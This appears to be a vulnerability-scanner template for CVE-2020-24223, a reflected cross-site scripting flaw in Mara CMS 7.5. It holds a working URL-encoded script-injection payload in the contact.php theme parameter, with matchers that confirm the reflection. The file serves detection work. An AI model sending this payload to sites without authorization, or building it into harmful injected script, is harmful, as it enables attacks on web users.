28 lines
743 B
YAML
28 lines
743 B
YAML
id: cve-2020-24223
|
|
|
|
info:
|
|
name: Mara CMS 7.5 - Reflective Cross-Site Scripting
|
|
author: pikpikcu
|
|
severity: medium
|
|
|
|
# Vendor Homepage: https://sourceforge.net/projects/maracms/
|
|
# Software Link: https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download
|
|
# Source: https://www.exploit-db.com/exploits/48777
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
words:
|
|
- '"><script>alert(document.domain)</script>'
|
|
part: body
|
|
- type: word
|
|
words:
|
|
- "text/html"
|
|
part: header |